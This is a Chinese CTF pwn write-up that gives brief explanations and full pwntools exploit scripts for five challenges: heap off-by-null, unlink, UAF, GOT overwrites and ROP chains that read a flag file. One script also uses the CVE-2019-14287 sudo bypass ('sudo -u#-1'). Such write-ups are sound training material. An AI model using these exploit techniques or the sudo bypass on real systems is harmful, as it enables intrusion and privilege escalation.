pwn题目质量这次感觉偏低了,感觉还没有去年某些时候的题目质量高,可能此次题目难度集中在新增的两个类型题目上面了吧,出题师傅看见轻打 [附件]
emarm
泄漏下libc地址,然后计算下基址,因为远程qemu无随机化,所以直接任意写改got表即可
from pwn import *

# emarm: the local qemu process is spawned and then immediately shadowed by
# the remote handle, so only the remote target is driven below.
p = process("qemu-aarch64 -L . ./emarm", shell=True)
target = ('183.129.189.60', 10012)
p = remote(*target)
elf = ELF('./emarm')
libc = ELF('./libc.so.6')

# 0x4000830000 is the fixed libc load address the write-up assumes for the
# un-randomised remote qemu (see the text above).
p.sendlineafter('passwd:', '\x00')
p.send(str(elf.got['atoi']))
system = 0x4000830000 + libc.sym['system']
p.sendafter('success', p64(system))
p.interactive()
ememarm
同样是ARM架构的ELF文件,QEMU启动然后发现有个off by null,通过创造一个fake chunk,实现任意写改free_hook为system后利用程序结束时的free执行/bin/sh
1 | from pwn import* |
def menu(ch):
    """Answer the 'choice:' prompt with menu entry *ch*."""
    choice = str(ch)
    p.sendlineafter('choice:', choice)
def add(content1, content2, sign):
    """Menu entry 1: send both payloads raw, then answer 'delete?' with *sign*."""
    menu(1)
    for prompt, data in (('cx:', content1), ('cy:', content2)):
        p.sendafter(prompt, data)
    p.sendlineafter('delete?', str(sign))
def free(index, content):
    """Menu entry 3: send *index* as a line, then *content* without a newline."""
    menu(3)
    idx = str(index)
    p.sendline(idx)
    p.send(content)
def gift(content1, content2, sign):
    """Menu entry 4: same prompt sequence as add(), under a different menu entry."""
    menu(4)
    for prompt, data in (('cx:', content1), ('cy:', content2)):
        p.sendafter(prompt, data)
    p.sendlineafter('delete?', str(sign))
18 | |
# ememarm: the local qemu process is spawned and then shadowed by the remote
# handle, so only the remote target is driven below.
p = process("qemu-aarch64 -g 5555 -L . ./main", shell=True)
p = remote('183.129.189.60', 10034)
elf = ELF('./main')
libc = ELF('./libc.so.6')
p.send('/bin/sh\x00')

# Three allocations; only the last one answers 'delete?' with 1.
for sign in (0, 0, 1):
    add('FMYY', 'FMYY', sign)

gift('FMYY', p64(0x31), 1)
free(1, p64(0) + p64(0x41) + 'FMYYSSSS')

# Same fixed libc load constant as the emarm script above.
libc_load = 0x4000830000
gift('FMYY', p64(libc_load + libc.sym['__free_hook']), 0)
free(2, p64(libc_load + libc.sym['system']))
menu(5)
p.interactive()
justcode
简单在栈上布置ROP,然后修改got表,将栈迁移上去即可
from pwn import *

context.log_level = 'DEBUG'

# justcode: the local process is created and then shadowed by the remote
# handle; only the remote connection is used from here on.
p = process('./main')
p = remote('183.129.189.60', 10041)
libc = ELF('./libc-2.23.so')


def _leak_addr(adjust):
    """Read up to the next 0x7F byte, take the last 6 bytes as a little-endian
    pointer and subtract *adjust* from it."""
    raw = p.recvuntil('\x7F')[-6:].ljust(8, '\x00')
    return u64(raw) - adjust


for choice in ('1', '1', '1', '2'):
    p.sendline(choice)

p.sendafter('name:', 'F' * 8)
libc_base = _leak_addr(0x7B61E)
log.info('LIBC:\t' + hex(libc_base))
p.sendafter('name:', 'F' * 40)
stack = _leak_addr(0xD0)
log.info('Stack:\t' + hex(stack))

Open = libc_base + libc.symbols["open"]
Read = libc_base + libc.symbols["read"]
Puts = libc_base + libc.symbols['puts']
pop_rdi_ret = libc_base + 0x21112
pop_rsi_ret = libc_base + 0x202F8
pop_rdx_ret = libc_base + 0x1B92   # assigned but not referenced below
pop_rdx_xx = libc_base + 0xEA759
scratch = libc_base + libc.bss() + 0x200

chunks = [
    p64(pop_rdi_ret), p64(stack + 0x78),
    p64(pop_rsi_ret), p64(0),
    p64(Open),
    p64(pop_rdi_ret), p64(3),
    p64(pop_rsi_ret), p64(scratch),
    p64(Read),
    p64(pop_rdi_ret), p64(scratch),
    p64(Puts),
    './flag\x00\x00',
]
orw = ''.join(chunks)

payload = p64(0x30) + '\x00' * 4 + p32(0x602028) + orw
p.sendlineafter('name:', payload)
p.sendlineafter('id', str(pop_rdx_xx & 0xFFFFFFFF))
p.interactive()
undlv 【FB】
2.23的one_gadget有两个和read函数可以爆破到同一个内存页,所以构造unlink任意写修改read的got表,然后CVE-2019-14287获取flag,这个题太水了
1 | from pwn import* |
def menu(ch):
    """Send menu entry *ch* as a line, then wait 0.1s for the target to catch up."""
    choice = str(ch)
    p.sendline(choice)
    sleep(0.1)
def add(idx):
    """Menu entry 1 followed by the index line, with a short pause afterwards."""
    menu(1)
    index_line = str(idx)
    p.sendline(index_line)
    sleep(0.1)
def edit(idx, content):
    """Menu entry 2: send the index as a line, pause, send *content* raw, pause."""
    menu(2)
    index_line = str(idx)
    p.sendline(index_line)
    sleep(0.1)
    p.send(content)
    sleep(0.1)
def free(idx):
    """Menu entry 3 followed by the index line, with a short pause afterwards."""
    menu(3)
    index_line = str(idx)
    p.sendline(index_line)
    sleep(0.1)
# undlv: the local process is spawned and then shadowed by the remote handle.
p = process('./main')
elf = ELF('./main')
p = remote('183.129.189.60', 10013)
libc = ELF('./libc-2.23.so')   # loaded but not referenced below

LIST = 0x403480
header = p64(0) + p64(0xF1) + p64(LIST - 0x18) + p64(LIST - 0x10)
payload = header.ljust(0xF0, '\x00') + p64(0xF0)

for idx in (0, 1):
    add(idx)
menu(4)
edit(0, payload)
free(1)
edit(0, '\x00' * 0x18 + p64(elf.got['read']))
edit(0, '\x07\x42')
# pause() blocks until the operator continues; the final line is the
# CVE-2019-14287 step named in the text above, which only works against a
# sudo version that still has that bug.
pause()
p.sendline('sudo -u#-1 cat flag')
p.interactive()
vtcpp [FB]
UAF,有一说一,给我把libc文件中setcontext的寄存器改了,让我卡了两个小时,我一度以为一直是rdi在控制参数,结果变成rcx控制了,那就换一个通用gadget来栈迁移即可
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
def menu(ch):
    """Answer the '> ' prompt with menu entry *ch*."""
    choice = str(ch)
    p.sendlineafter('> ', choice)
def new(name, age, msg):
    """Menu entry 1: answer the name, age and message prompts in turn."""
    menu(1)
    answers = (('name: ', name), ('age: ', str(age)), ('message: ', msg))
    for prompt, value in answers:
        p.sendlineafter(prompt, value)
def note(size, note):
    """Menu entry 4: send *size* as a line, then *note* raw after 'content: '."""
    menu(4)
    size_line = str(size)
    p.sendlineafter('size: ', size_line)
    p.sendafter('content: ', note)
# vtcpp: three handles are assigned in a row; the first two (plain local
# process, local process with LD_PRELOAD) are shadowed and only the remote
# connection is used below.
p = process('./main')
p = process(['./main'],env={'LD_PRELOAD':'./libc-2.23.so'})
p = remote('183.129.189.60',10000)
context.binary = './main'
elf = ELF('./main')   # loaded but not referenced below
libc = ELF('./libc-2.23.so')
new('FMYY',16,'FMYY')
menu(2)
note(0x38,p64(0x401D98) + p64(0) + p64(0x603328) + p64(8))
menu(3)
# Take the 6 bytes ending at the first 0x7F, zero-extend to 8 bytes and
# subtract the stdout symbol offset to get the libc base.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdout_']

new('FMYY',16,'FMYY')
new('FMYY',16,'FMYY')
menu(2)
note(0x38,p64(0x401D98) + p64(0) + p64(0x603340) + p64(8))
menu(3)

# heap, top and heap2 below are only logged; nothing later reads them.
p.recvuntil('name :')
heap = u64(p.recv(8))
log.info('HEAP:\t' + hex(heap))

menu(2)
note(0x38,p64(0x401D98) + p64(0) + p64(libc_base + libc.sym['__malloc_hook'] + 0x68) + p64(8))
menu(3)
p.recvuntil('name :')
top = u64(p.recv(8))
log.info('TOP:\t' + hex(top))

for i in range(2):
    note(0x38,'FMYY')
for i in range(4):
    note(0x10,'FMYY')


new('FMYY',16,'FMYY')
menu(2)
note(0x38,p64(0x401D98) + p64(0) + p64(0x603340) + p64(8))
menu(3)
p.recvuntil('name :')
heap2 = u64(p.recv(8))
log.info('HEAP2:\t' + hex(heap2))
menu(3)

# Addresses are all relative to libc_base; Puts and ret are assigned but not
# used in the chain that follows.
magic = 0x603360
Open = libc_base + libc.symbols["openat"]
Read = libc_base + libc.symbols["read"]
Write = libc_base + libc.symbols['write']
Puts = libc_base + libc.sym['puts']
pop_rdi_ret = libc_base + 0x0000000000021112
pop_rsi_ret = libc_base + 0x00000000000202F8
pop_rdx_ret = libc_base + 0x0000000000001B92
leave_ret = libc_base + 0x0000000000042361
ret = pop_rdi_ret + 1
orw = ''
orw += p64(pop_rdi_ret) + p64(0)
orw += p64(pop_rsi_ret) + p64(leave_ret)
orw += p64(pop_rsi_ret) + p64(magic + 0xA0)
orw += p64(pop_rdx_ret) + p64(0)
orw += p64(Open)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(0x603400)
orw += p64(pop_rdx_ret) + p64(0x30)
orw += p64(Read)
orw += p64(pop_rdi_ret)+p64(1)
orw += p64(Write)
orw += '/flag\x00\x00'

gadget1 = 0x000000000007371E + libc_base
new('FMYY',16,p64(gadget1) + orw)
menu(2)
note(0x38,p64(magic))
note(0x100,'\x00'*0x58 + p64(magic))
#gdb.attach(p,"b *0x401826")
menu(3)

log.info('LIBC:\t' + hex(libc_base))
p.interactive()